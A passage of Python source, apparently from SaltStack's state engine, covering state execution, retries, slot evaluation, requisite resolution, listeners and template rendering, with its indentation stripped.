elif isinstance(cdata["kwargs"].get("env", None), str):
# User is using a deprecated env setting which was parsed by
# format_call.
# We check for a string type since module functions which
# allow setting the OS environ also make use of the "env"
# keyword argument, which is not a string
inject_globals["__env__"] = str(cdata["kwargs"]["env"])
if "__env__" not in inject_globals:
# Let's use the default environment
inject_globals["__env__"] = "base"
if "__orchestration_jid__" in low:
inject_globals["__orchestration_jid__"] = low["__orchestration_jid__"]
if "result" not in ret or ret["result"] is False:
self.states.inject_globals = inject_globals
if self.mocked:
ret = mock_ret(cdata)
else:
# Execute the state function
if not low.get("__prereq__") and low.get("parallel"):
# run the state call in parallel, but only if not in a prereq
ret = self.call_parallel(cdata, low)
else:
self.format_slots(cdata)
ret = self.states[cdata["full"]](
*cdata["args"], **cdata["kwargs"]
)
self.states.inject_globals = {}
if (
"check_cmd" in low
and "{0[state]}.mod_run_check_cmd".format(low) not in self.states
):
ret.update(self._run_check_cmd(low))
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
# guessable and fallback in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {}".format(trb),
}
finally:
if low.get("__prereq__"):
sys.modules[self.states[cdata["full"]].__module__].__opts__[
"test"
] = test
self.state_con.pop("runas", None)
self.state_con.pop("runas_password", None)
if not isinstance(ret, dict):
return ret
# If format_call got any warnings, let's show them to the user
if "warnings" in cdata:
ret.setdefault("warnings", []).extend(cdata["warnings"])
if "provider" in low:
self.load_modules()
if low.get("__prereq__"):
low["__prereq__"] = False
return ret
ret["__sls__"] = low.get("__sls__")
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
utc_finish_time = datetime.datetime.utcnow()
timezone_delta = datetime.datetime.utcnow() - datetime.datetime.now()
local_finish_time = utc_finish_time - timezone_delta
local_start_time = utc_start_time - timezone_delta
ret["start_time"] = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
ret["__id__"] = low["__id__"]
log.info(
"Completed state [%s] at time %s (duration_in_ms=%s)",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_finish_time.time().isoformat(),
duration,
)
if "retry" in low:
low["retry"] = self.verify_retry_data(low["retry"])
if not sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]:
if low["retry"]["until"] != ret["result"]:
if low["retry"]["attempts"] > retries:
interval = low["retry"]["interval"]
if low["retry"]["splay"] != 0:
interval = interval + random.randint(
0, low["retry"]["splay"]
)
log.info(
"State result does not match retry until value, "
"state will be re-run in %s seconds",
interval,
)
self.functions["test.sleep"](interval)
retry_ret = self.call(low, chunks, running, retries=retries + 1)
orig_ret = ret
ret = retry_ret
ret["comment"] = "\n".join(
[
(
'Attempt {}: Returned a result of "{}", '
'with the following comment: "{}"'.format(
retries, orig_ret["result"], orig_ret["comment"]
)
),
"" if not ret["comment"] else ret["comment"],
]
)
ret["duration"] = (
ret["duration"] + orig_ret["duration"] + (interval * 1000)
)
if retries == 1:
ret["start_time"] = orig_ret["start_time"]
else:
ret["comment"] = " ".join(
[
"" if not ret["comment"] else str(ret["comment"]),
(
"The state would be retried every {1} seconds "
"(with a splay of up to {3} seconds) "
"a maximum of {0} times or until a result of {2} "
"is returned"
).format(
low["retry"]["attempts"],
low["retry"]["interval"],
low["retry"]["until"],
low["retry"]["splay"],
),
]
)
return ret
def __eval_slot(self, slot):
log.debug("Evaluating slot: %s", slot)
fmt = slot.split(":", 2)
if len(fmt) != 3:
log.warning("Malformed slot: %s", slot)
return slot
if fmt[1] != "salt":
log.warning("Malformed slot: %s", slot)
log.warning(
"Only execution modules are currently supported in slots. This means slot "
'should start with "__slot__:salt:"'
)
return slot
fun, args, kwargs = salt.utils.args.parse_function(fmt[2])
if not fun or fun not in self.functions:
log.warning("Malformed slot: %s", slot)
log.warning(
"Execution module should be specified in a function call format: "
"test.arg('arg', kw='kwarg')"
)
return slot
log.debug("Calling slot: %s(%s, %s)", fun, args, kwargs)
slot_return = self.functions[fun](*args, **kwargs)
# Given input __slot__:salt:test.arg(somekey="value").not.exist ~ /appended
# slot_text should be __slot...).not.exist
# append_data should be ~ /appended
slot_text = fmt[2].split("~")[0]
append_data = fmt[2].split("~", 1)[1:]
log.debug("slot_text: %s", slot_text)
log.debug("append_data: %s", append_data)
# Support parsing slot dict response
# return_get should result in a kwargs.nested.dict path by getting
# everything after first closing paren: )
return_get = None
try:
return_get = slot_text[slot_text.rindex(")") + 1 :]
except ValueError:
pass
if return_get:
# remove first period
return_get = return_get.split(".", 1)[1].strip()
log.debug("Searching slot result %s for %s", slot_return, return_get)
slot_return = salt.utils.data.traverse_dict_and_list(
slot_return, return_get, default=None, delimiter="."
)
if append_data:
if isinstance(slot_return, str):
# Append text to slot string result
append_data = " ".join(append_data).strip()
log.debug("appending to slot result: %s", append_data)
slot_return += append_data
else:
log.error("Ignoring slot append, slot result is not a string")
return slot_return
def format_slots(self, cdata):
"""
Read in the arguments from the low level slot syntax to make a last
minute runtime call to gather relevant data for the specific routine
Will parse strings, first level of dictionary values, and strings and
first level dict values inside of lists
"""
# __slot__:salt.cmd.run(foo, bar, baz=qux)
SLOT_TEXT = "__slot__:"
ctx = (("args", enumerate(cdata["args"])), ("kwargs", cdata["kwargs"].items()))
for atype, avalues in ctx:
for ind, arg in avalues:
arg = salt.utils.data.decode(arg, keep=True)
if isinstance(arg, dict):
# Search dictionary values for __slot__:
for key, value in arg.items():
try:
if value.startswith(SLOT_TEXT):
log.trace("Slot processsing dict value %s", value)
cdata[atype][ind][key] = self.__eval_slot(value)
except AttributeError:
# Not a string/slot
continue
elif isinstance(arg, list):
for idx, listvalue in enumerate(arg):
log.trace("Slot processing list value: %s", listvalue)
if isinstance(listvalue, dict):
# Search dict values in list for __slot__:
for key, value in listvalue.items():
try:
if value.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested dict value %s",
value,
)
cdata[atype][ind][idx][key] = self.__eval_slot(
value
)
except AttributeError:
# Not a string/slot
continue
if isinstance(listvalue, str):
# Search strings in a list for __slot__:
if listvalue.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested string %s", listvalue
)
cdata[atype][ind][idx] = self.__eval_slot(listvalue)
elif isinstance(arg, str) and arg.startswith(SLOT_TEXT):
# Search strings for __slot__:
log.trace("Slot processsing %s", arg)
cdata[atype][ind] = self.__eval_slot(arg)
else:
# Not a slot, skip it
continue
def verify_retry_data(self, retry_data):
"""
verifies the specified retry data
"""
retry_defaults = {
"until": True,
"attempts": 2,
"splay": 0,
"interval": 30,
}
expected_data = {
"until": bool,
"attempts": int,
"interval": int,
"splay": int,
}
validated_retry_data = {}
if isinstance(retry_data, dict):
for expected_key, value_type in expected_data.items():
if expected_key in retry_data:
if isinstance(retry_data[expected_key], value_type):
validated_retry_data[expected_key] = retry_data[expected_key]
else:
log.warning(
"An invalid value was passed for the retry %s, "
"using default value '%s'",
expected_key,
retry_defaults[expected_key],
)
validated_retry_data[expected_key] = retry_defaults[
expected_key
]
else:
validated_retry_data[expected_key] = retry_defaults[expected_key]
else:
log.warning(
"State is set to retry, but a valid dict for retry "
"configuration was not found. Using retry defaults"
)
validated_retry_data = retry_defaults
return validated_retry_data
def call_chunks(self, chunks):
"""
Iterate over a list of chunks and call them, checking for requires.
"""
# Check for any disabled states
disabled = {}
if "state_runs_disabled" in self.opts["grains"]:
for low in chunks[:]:
state_ = "{}.{}".format(low["state"], low["fun"])
for pat in self.opts["grains"]["state_runs_disabled"]:
if fnmatch.fnmatch(state_, pat):
comment = (
'The state function "{0}" is currently disabled by "{1}", '
"to re-enable, run state.enable {1}."
).format(state_, pat,)
_tag = _gen_tag(low)
disabled[_tag] = {
"changes": {},
"result": False,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
chunks.remove(low)
break
running = {}
for low in chunks:
if "__FAILHARD__" in running:
running.pop("__FAILHARD__")
return running
tag = _gen_tag(low)
if tag not in running:
# Check if this low chunk is paused
action = self.check_pause(low)
if action == "kill":
break
running = self.call_chunk(low, running, chunks)
if self.check_failhard(low, running):
return running
self.active = set()
while True:
if self.reconcile_procs(running):
break
time.sleep(0.01)
ret = dict(list(disabled.items()) + list(running.items()))
return ret
def check_failhard(self, low, running):
"""
Check if the low data chunk should send a failhard signal
"""
tag = _gen_tag(low)
if self.opts.get("test", False):
return False
if low.get("failhard", self.opts["failhard"]) and tag in running:
if running[tag]["result"] is None:
return False
return not running[tag]["result"]
return False
def check_pause(self, low):
"""
Check to see if this low chunk has been paused
"""
if not self.jid:
# Can't pause on salt-ssh since we can't track continuous state
return
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
start = time.time()
if os.path.isfile(pause_path):
try:
while True:
tries = 0
with salt.utils.files.fopen(pause_path, "rb") as fp_:
try:
pdat = msgpack_deserialize(fp_.read())
except salt.utils.msgpack.exceptions.UnpackValueError:
# Reading race condition
if tries > 10:
# Break out if there are a ton of read errors
return
tries += 1
time.sleep(1)
continue
id_ = low["__id__"]
key = ""
if id_ in pdat:
key = id_
elif "__all__" in pdat:
key = "__all__"
if key:
if "duration" in pdat[key]:
now = time.time()
if now - start > pdat[key]["duration"]:
return "run"
if "kill" in pdat[key]:
return "kill"
else:
return "run"
time.sleep(1)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Failed to read in pause data for file located at: %s", pause_path
)
return "run"
return "run"
def reconcile_procs(self, running):
"""
Check the running dict for processes and resolve them
"""
retset = set()
for tag in running:
proc = running[tag].get("proc")
if proc:
if not proc.is_alive():
ret_cache = os.path.join(
self.opts["cachedir"],
self.jid,
salt.utils.hashutils.sha1_digest(tag),
)
if not os.path.isfile(ret_cache):
ret = {
"result": False,
"comment": "Parallel process failed to return",
"name": running[tag]["name"],
"changes": {},
}
try:
with salt.utils.files.fopen(ret_cache, "rb") as fp_:
ret = msgpack_deserialize(fp_.read())
except OSError:
ret = {
"result": False,
"comment": "Parallel cache failure",
"name": running[tag]["name"],
"changes": {},
}
running[tag].update(ret)
running[tag].pop("proc")
else:
retset.add(False)
return False not in retset
def check_requisite(self, low, running, chunks, pre=False):
"""
Look into the running data to check the status of all requisite
states
"""
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
present = False
# If mod_watch is not available make it a require
if "watch" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require" in low:
low["require"].extend(low.pop("watch"))
else:
low["require"] = low.pop("watch")
else:
present = True
if "watch_any" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require_any" in low:
low["require_any"].extend(low.pop("watch_any"))
else:
low["require_any"] = low.pop("watch_any")
else:
present = True
if "require" in low:
present = True
if "require_any" in low:
present = True
if "prerequired" in low:
present = True
if "prereq" in low:
present = True
if "onfail" in low:
present = True
if "onfail_any" in low:
present = True
if "onfail_all" in low:
present = True
if "onchanges" in low:
present = True
if "onchanges_any" in low:
present = True
if not present:
return "met", ()
self.reconcile_procs(running)
reqs = {
"require": [],
"require_any": [],
"watch": [],
"watch_any": [],
"prereq": [],
"onfail": [],
"onfail_any": [],
"onfail_all": [],
"onchanges": [],
"onchanges_any": [],
}
if pre:
reqs["prerequired"] = []
for r_state in reqs:
if r_state in low and low[r_state] is not None:
if r_state in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", r_state
)
continue
for req in low[r_state]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
for chunk in chunks:
req_key = next(iter(req))
req_val = req[req_key]
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
found = True
reqs[r_state].append(chunk)
continue
try:
if isinstance(req_val, str):
if fnmatch.fnmatch(
chunk["name"], req_val
) or fnmatch.fnmatch(chunk["__id__"], req_val):
if req_key == "id" or chunk["state"] == req_key:
found = True
reqs[r_state].append(chunk)
else:
raise KeyError
except KeyError as exc:
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
except TypeError:
# On Python 2, the above req_val, being an OrderedDict, will raise a KeyError,
# however on Python 3 it will raise a TypeError
# This was found when running tests.unit.test_state.StateCompilerTestCase.test_render_error_on_invalid_requisite
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
if not found:
return "unmet", ()
fun_stats = set()
for r_state, chunks in reqs.items():
req_stats = set()
if r_state.startswith("prereq") and not r_state.startswith("prerequired"):
run_dict = self.pre
else:
run_dict = running
while True:
if self.reconcile_procs(run_dict):
break
time.sleep(0.01)
for chunk in chunks:
tag = _gen_tag(chunk)
if tag not in run_dict:
req_stats.add("unmet")
continue
if r_state.startswith("onfail"):
if run_dict[tag]["result"] is True:
req_stats.add("onfail") # At least one state is OK
continue
else:
if run_dict[tag]["result"] is False:
req_stats.add("fail")
continue
if r_state.startswith("onchanges"):
if not run_dict[tag]["changes"]:
req_stats.add("onchanges")
else:
req_stats.add("onchangesmet")
continue
if r_state.startswith("watch") and run_dict[tag]["changes"]:
req_stats.add("change")
continue
if r_state.startswith("prereq") and run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("premet")
if r_state.startswith("prereq") and not run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("pre")
else:
if run_dict[tag].get("__state_ran__", True):
req_stats.add("met")
if r_state.endswith("_any") or r_state == "onfail":
if "met" in req_stats or "change" in req_stats:
if "fail" in req_stats:
req_stats.remove("fail")
if "onchangesmet" in req_stats:
if "onchanges" in req_stats:
req_stats.remove("onchanges")
if "fail" in req_stats:
req_stats.remove("fail")
if "onfail" in req_stats:
# a met requisite in this case implies a success
if "met" in req_stats:
req_stats.remove("onfail")
if r_state.endswith("_all"):
if "onfail" in req_stats:
# a met requisite in this case implies a failure
if "met" in req_stats:
req_stats.remove("met")
fun_stats.update(req_stats)
if "unmet" in fun_stats:
status = "unmet"
elif "fail" in fun_stats:
status = "fail"
elif "pre" in fun_stats:
if "premet" in fun_stats:
status = "met"
else:
status = "pre"
elif "onfail" in fun_stats and "onchangesmet" not in fun_stats:
status = "onfail"
elif "onchanges" in fun_stats and "onchangesmet" not in fun_stats:
status = "onchanges"
elif "change" in fun_stats:
status = "change"
else:
status = "met"
return status, reqs
def event(self, chunk_ret, length, fire_event=False):
"""
Fire an event on the master bus
If `fire_event` is set to True an event will be sent with the
chunk name in the tag and the chunk result in the event data.
If `fire_event` is set to a string such as `mystate/is/finished`,
an event will be sent with the string added to the tag and the chunk
result in the event data.
If the `state_events` is set to True in the config, then after the
chunk is evaluated an event will be set up to the master with the
results.
"""
if not self.opts.get("local") and (
self.opts.get("state_events", True) or fire_event
):
if not self.opts.get("master_uri"):
ev_func = lambda ret, tag, preload=None: salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
).fire_event(
ret, tag
)
else:
ev_func = self.functions["event.fire_master"]
ret = {"ret": chunk_ret}
if fire_event is True:
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(chunk_ret["name"])], "state_result",
)
elif isinstance(fire_event, str):
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(fire_event)], "state_result",
)
else:
tag = salt.utils.event.tagify(
[self.jid, "prog", self.opts["id"], str(chunk_ret["__run_num__"])],
"job",
)
ret["len"] = length
preload = {"jid": self.jid}
ev_func(ret, tag, preload=preload)
def call_chunk(self, low, running, chunks):
"""
Check if a chunk has any requires, execute the requires and then
the chunk
"""
low = self._mod_aggregate(low, running, chunks)
self._mod_init(low)
tag = _gen_tag(low)
if not low.get("prerequired"):
self.active.add(tag)
requisites = [
"require",
"require_any",
"watch",
"watch_any",
"prereq",
"onfail",
"onfail_any",
"onchanges",
"onchanges_any",
]
if not low.get("__prereq__"):
requisites.append("prerequired")
status, reqs = self.check_requisite(low, running, chunks, pre=True)
else:
status, reqs = self.check_requisite(low, running, chunks)
if status == "unmet":
lost = {}
reqs = []
for requisite in requisites:
lost[requisite] = []
if requisite not in low:
continue
for req in low[requisite]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
req_key = next(iter(req))
req_val = req[req_key]
for chunk in chunks:
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
if requisite == "prereq":
chunk["__prereq__"] = True
reqs.append(chunk)
found = True
continue
if fnmatch.fnmatch(chunk["name"], req_val) or fnmatch.fnmatch(
chunk["__id__"], req_val
):
if req_key == "id" or chunk["state"] == req_key:
if requisite == "prereq":
chunk["__prereq__"] = True
elif requisite == "prerequired":
chunk["__prerequired__"] = True
reqs.append(chunk)
found = True
if not found:
lost[requisite].append(req)
if (
lost["require"]
or lost["watch"]
or lost["prereq"]
or lost["onfail"]
or lost["onchanges"]
or lost["require_any"]
or lost["watch_any"]
or lost["onfail_any"]
or lost["onchanges_any"]
or lost.get("prerequired")
):
comment = "The following requisites were not found:\n"
for requisite, lreqs in lost.items():
if not lreqs:
continue
comment += "{}{}:\n".format(" " * 19, requisite)
for lreq in lreqs:
req_key = next(iter(lreq))
req_val = lreq[req_key]
comment += "{}{}: {}\n".format(" " * 23, req_key, req_val)
if low.get("__prereq__"):
run_dict = self.pre
else:
run_dict = running
start_time, duration = _calculate_fake_duration()
run_dict[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(run_dict[tag], len(chunks), fire_event=low.get("fire_event"))
return running
for chunk in reqs:
# Check to see if the chunk has been run, only run it if
# it has not been run already
ctag = _gen_tag(chunk)
if ctag not in running:
if ctag in self.active:
if chunk.get("__prerequired__"):
# Prereq recusive, run this chunk with prereq on
if tag not in self.pre:
low["__prereq__"] = True
self.pre[ctag] = self.call(low, chunks, running)
return running
else:
return running
elif ctag not in running:
log.error("Recursive requisite found")
running[tag] = {
"changes": {},
"result": False,
"comment": "Recursive requisite found",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(
running[tag], len(chunks), fire_event=low.get("fire_event")
)
return running
running = self.call_chunk(chunk, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
if low.get("__prereq__"):
status, reqs = self.check_requisite(low, running, chunks)
self.pre[tag] = self.call(low, chunks, running)
if not self.pre[tag]["changes"] and status == "change":
self.pre[tag]["changes"] = {"watch": "watch"}
self.pre[tag]["result"] = None
else:
running = self.call_chunk(low, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
elif status == "met":
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
elif status == "fail":
# if the requisite that failed was due to a prereq on this low state
# show the normal error
if tag in self.pre:
running[tag] = self.pre[tag]
running[tag]["__run_num__"] = self.__run_num
running[tag]["__sls__"] = low["__sls__"]
# otherwise the failure was due to a requisite down the chain
else:
# determine what the requisite failures where, and return
# a nice error message
failed_requisites = set()
# look at all requisite types for a failure
for req_lows in reqs.values():
for req_low in req_lows:
req_tag = _gen_tag(req_low)
req_ret = self.pre.get(req_tag, running.get(req_tag))
# if there is no run output for the requisite it
# can't be the failure
if req_ret is None:
continue
# If the result was False (not None) it was a failure
if req_ret["result"] is False:
# use SLS.ID for the key-- so its easier to find
key = "{sls}.{_id}".format(
sls=req_low["__sls__"], _id=req_low["__id__"]
)
failed_requisites.add(key)
_cmt = "One or more requisite failed: {}".format(
", ".join(str(i) for i in failed_requisites)
)
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": _cmt,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.pre[tag] = running[tag]
self.__run_num += 1
elif status == "change" and not low.get("__prereq__"):
ret = self.call(low, chunks, running)
if not ret["changes"] and not ret.get("skip_watch", False):
low = low.copy()
low["sfun"] = low["fun"]
low["fun"] = "mod_watch"
low["__reqs__"] = reqs
ret = self.call(low, chunks, running)
running[tag] = ret
elif status == "pre":
start_time, duration = _calculate_fake_duration()
pre_ret = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "No changes detected",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
running[tag] = pre_ret
self.pre[tag] = pre_ret
self.__run_num += 1
elif status == "onfail":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because onfail req did not change",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
elif status == "onchanges":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because none of the onchanges reqs changed",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
else:
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
if tag in running:
self.event(running[tag], len(chunks), fire_event=low.get("fire_event"))
return running
def call_listen(self, chunks, running):
"""
Find all of the listen routines and call the associated mod_watch runs
"""
listeners = []
crefs = {}
for chunk in chunks:
crefs[(chunk["state"], chunk["__id__"], chunk["name"])] = chunk
if "listen" in chunk:
listeners.append(
{(chunk["state"], chunk["__id__"], chunk["name"]): chunk["listen"]}
)
if "listen_in" in chunk:
for l_in in chunk["listen_in"]:
for key, val in l_in.items():
listeners.append(
{(key, val, "lookup"): [{chunk["state"]: chunk["__id__"]}]}
)
mod_watchers = []
errors = {}
for l_dict in listeners:
for key, val in l_dict.items():
for listen_to in val:
if not isinstance(listen_to, dict):
found = False
for chunk in chunks:
if (
chunk["__id__"] == listen_to
or chunk["name"] == listen_to
):
listen_to = {chunk["state"]: chunk["__id__"]}
found = True
if not found:
continue
for lkey, lval in listen_to.items():
if not any(lkey == cref[0] and lval in cref for cref in crefs):
rerror = {
_l_tag(lkey, lval): {
"comment": "Referenced state {}: {} does not exist".format(
lkey, lval
),
"name": "listen_{}:{}".format(lkey, lval),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
to_tags = [
_gen_tag(data)
for cref, data in crefs.items()
if lkey == cref[0] and lval in cref
]
for to_tag in to_tags:
if to_tag not in running:
continue
if running[to_tag]["changes"]:
if not any(
key[0] == cref[0] and key[1] in cref
for cref in crefs
):
rerror = {
_l_tag(key[0], key[1]): {
"comment": "Referenced state {}: {} does not exist".format(
key[0], key[1]
),
"name": "listen_{}:{}".format(
key[0], key[1]
),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
new_chunks = [
data
for cref, data in crefs.items()
if key[0] == cref[0] and key[1] in cref
]
for chunk in new_chunks:
low = chunk.copy()
low["sfun"] = chunk["fun"]
low["fun"] = "mod_watch"
low["__id__"] = "listener_{}".format(low["__id__"])
for req in STATE_REQUISITE_KEYWORDS:
if req in low:
low.pop(req)
mod_watchers.append(low)
ret = self.call_chunks(mod_watchers)
running.update(ret)
for err in errors:
errors[err]["__run_num__"] = self.__run_num
self.__run_num += 1
running.update(errors)
return running
def call_high(self, high, orchestration_jid=None):
"""
Process a high data call and ensure the defined states.
"""
errors = []
# If there is extension data reconcile it
high, ext_errors = self.reconcile_extend(high)
errors.extend(ext_errors)
errors.extend(self.verify_high(high))
if errors:
return errors
high, req_in_errors = self.requisite_in(high)
errors.extend(req_in_errors)
high = self.apply_exclude(high)
# Verify that the high data is structurally sound
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.compile_high_data(high, orchestration_jid)
# If there are extensions in the highstate, process them and update
# the low data chunks
if errors:
return errors
ret = self.call_chunks(chunks)
ret = self.call_listen(chunks, ret)
def _cleanup_accumulator_data():
accum_data_path = os.path.join(
get_accumulator_dir(self.opts["cachedir"]), self.instance_id
)
try:
os.remove(accum_data_path)
log.debug("Deleted accumulator data file %s", accum_data_path)
except OSError:
log.debug("File %s does not exist, no need to cleanup", accum_data_path)
_cleanup_accumulator_data()
if self.jid is not None:
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
if os.path.isfile(pause_path):
try:
os.remove(pause_path)
except OSError:
# File is not present, all is well
pass
return ret
def render_template(self, high, template):
errors = []
if not high:
return high, errors
if not isinstance(high, dict):
errors.append(
"Template {} does not render to a dictionary".format(template)
)
return high, errors
invalid_items = ("include", "exclude", "extends")
for item in invalid_items:
if item in high:
errors.append(
"The '{}' declaration found on '{}' is invalid when "
"rendering single templates".format(item, template)
)
return high, errors
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
# Is this is a short state, it needs to be padded
if "." in high[name]:
comps = high[name].split(".")
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
errors.append(
"ID {} in template {} is not a dictionary".format(
name, template
)
)
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if high[name][key] is None:
errors.append(
"ID '{}' in template {} contains a short "
"declaration ({}) with a trailing colon. When not "
"passing any arguments to a state, the colon must be "
"omitted.".format(name, template, key)
)
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in template '{}' contains multiple "
"state declarations of the same type".format(name, template)
)
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high, errors
def call_template(self, template):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, template)
if errors:
return errors
return self.call_high(high)
def call_template_str(self, template):
"""
Enforce the states in a template, pass the template as a string
"""
high = compile_template_str(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, "<template-str>")
if errors:
return errors
return self.call_high(high)
class LazyAvailStates:
"""
The LazyAvailStates lazily loads the list of states of available
environments.
This is particularly usefull when top_file_merging_strategy=same and there
are many environments.
"""
def __init__(self, hs):
self._hs = hs
self._avail = {"base": None}
self._filled = False
def _fill(self):
if self._filled:
return
for saltenv in self._hs._get_envs():
if saltenv not in self._avail:
self._avail[saltenv] = None
self._filled = True
def __contains__(self, saltenv):
if saltenv == "base":
return True
self._fill()
return saltenv in self._avail
def __getitem__(self, saltenv):
if saltenv != "base":
self._fill()
if self._avail[saltenv] is None:
self._avail[saltenv] = self._hs.client.list_states(saltenv)
return self._avail[saltenv]
def items(self):
self._fill()
ret = []
for saltenv, states in self._avail:
ret.append((saltenv, self.__getitem__(saltenv)))
return ret
class BaseHighState:
"""
The BaseHighState is an abstract base class that is the foundation of
running a highstate, extend it and add a self.state object of type State.
When extending this class, please note that ``self.client`` and
``self.matcher`` should be instantiated and handled.
"""
def __init__(self, opts):
self.opts = self.__gen_opts(opts)
self.iorder = 10000
self.avail = self.__gather_avail()
self.serial = salt.payload.Serial(self.opts)
self.building_highstate = OrderedDict()
def __gather_avail(self):
"""
Lazily gather the lists of available sls data from the master
"""
return LazyAvailStates(self)
def __gen_opts(self, opts):
"""
The options used by the High State object are derived from options
on the minion and the master, or just the minion if the high state
call is entirely local.
"""
# If the state is intended to be applied locally, then the local opts
# should have all of the needed data, otherwise overwrite the local
# data items with data from the master
if "local_state" in opts:
if opts["local_state"]:
return opts
mopts = self.client.master_opts()
if not isinstance(mopts, dict):
# An error happened on the master
opts["renderer"] = "jinja|yaml"
opts["failhard"] = False
opts["state_top"] = salt.utils.url.create("top.sls")
opts["nodegroups"] = {}
opts["file_roots"] = {"base": [syspaths.BASE_FILE_ROOTS_DIR]}
else:
opts["renderer"] = mopts["renderer"]
opts["failhard"] = mopts.get("failhard", False)
if mopts["state_top"].startswith("salt://"):
opts["state_top"] = mopts["state_top"]
elif mopts["state_top"].startswith("/"):
opts["state_top"] = salt.utils.url.create(mopts["state_top"][1:])
else:
opts["state_top"] = salt.utils.url.create(mopts["state_top"])
opts["state_top_saltenv"] = mopts.get("state_top_saltenv", None)
opts["nodegroups"] = mopts.get("nodegroups", {})
opts["state_auto_order"] = mopts.get(
"state_auto_order", opts["state_auto_order"]
)
opts["file_roots"] = mopts["file_roots"]
opts["top_file_merging_strategy"] = mopts.get(
"top_file_merging_strategy", opts.get("top_file_merging_strategy")
)
opts["env_order"] = mopts.get("env_order", opts.get("env_order", []))
opts["default_top"] = mopts.get("default_top", opts.get("default_top"))
opts["state_events"] = mopts.get("state_events")
opts["state_aggregate"] = mopts.get(
"state_aggregate", opts.get("state_aggregate", False)
)
opts["jinja_env"] = mopts.get("jinja_env", {})
opts["jinja_sls_env"] = mopts.get("jinja_sls_env", {})
opts["jinja_lstrip_blocks"] = mopts.get("jinja_lstrip_blocks", False)
opts["jinja_trim_blocks"] = mopts.get("jinja_trim_blocks", False)
return opts
def _get_envs(self):
"""
Pull the file server environments out of the master options
"""
